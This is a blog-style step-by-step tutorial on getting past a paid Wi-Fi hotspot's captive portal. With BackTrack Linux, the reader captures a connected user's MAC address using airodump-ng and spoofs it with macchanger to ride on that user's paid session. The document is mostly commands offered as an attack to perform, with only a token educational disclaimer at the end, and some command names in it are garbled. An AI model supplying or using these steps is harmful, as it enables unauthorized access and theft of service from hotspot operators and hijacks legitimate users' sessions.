How to Bypass Wi Fi HotSpot Access Control By Session Stealing

 In my previous posts, i have explained what is Session Stealing. Now let us see how to do that using backtrack linux and bypass the WiFi Hotspot access control.

Step 1:
Boot into your Backtrack Linux.  Start Wireless Assistant in Backtrack & confirm you have some wireless network around. Then you can click “Connect” to that network. It won’t let you connect because you are not the paid user. It will open up browser and will ask you to pay for usage.

Close it.

Step 2: Connectin up With Wi Fi Network (rausb0)

There are multiple ways you can do this & very simple would be to use Ping Scan from backtrack. I am demonstrating here by using AiroDump which will be an add on method for you to learn.

Open up your Shell or Konsole form Backtrack & now we have to put network in Monitor mode.

Type in ifconfig -a (Hit Enter)

You ll see list of network interfaces. I see “rausb0” in my list which I want to connect so type in following and hit enter again.

ifconfig rausb0 up

Now your network is up & we have to put network in monitor mode so type in following.

iwconfig rausb0 mode monitor (Hit Enter)

iwconfig (Enter again)

So now we are up in monitor mode. We have to start Airodump Next.

Step 3: Start Airodump

In the same shell type in

airo (Enter)

Then, type next

airodump –ng rausb0 ( Enter again)

Now we will see the SSID of the whole network. We have to find the user’s MAC address that is already on a network.

Step 4: Capturing MAC Address For Spoofing (of Connected User)

You ll see a list of SSID’s around there. But at the end of all lines you have to find out the name of Wi Fi access point.

E.g – You’ll Find attwifi if you are on the AT&T wifi network. As shown in following image.

MAC Address Session Stealing

You have to copy the MAC address corresponding to that wifi network. And use it in following command.

airodump –ng –bssid xx:xx:xx:xx:xx:xx rausb0 (Replace copied MAC Address at XX & Hit Enter)

It will now open up the rausb0 interface & will take some time to find out network traffic. Then you’ll see some stations with its packet data flow information. For security pick up the station that have more data packets flowing. (Like more than 30-40)

Copy the MAC ADDRESS of this station.

Now you have finalized the address to replace as our MAC address, you have to put back the network to Manage mode from monitor Mode.

If you have USB dongle plugged in simply unplug it, change MAC adrdress and plug it back again. If you are not USB dongle type in following and it enter again.

Ifconfig rausb0 down
Step 5 : Changing MAC Address

In your shell type in mac and hit enter to change MAC Address.

macchange –m xx:xx:xx:xx:xx:xx rausb0 (replace xx with copied MAC address & Enter)

Now you’ll see current MAC address & Fake MAC address .

Now you have to plug back in your USB you took out few minutes ago. Or if you have used command to put your interface down use following command to put it back up.

Ifconfig rausb0 up

Now your MAC address successfully changed you can check by typing ifconfig in console.
Step 6: Connecting to Hacked Wi Fi Network

Now you are done at Bypassing Wi Fi HotSpot’s Access Control Using Session Stealing & you can connect to hotspot as follows.

1. Open Wireless Assistant.
2. Select Network
3. Hit Connect

And you’re done !!!

 Disclaimer: This is For Educational Purpose Only.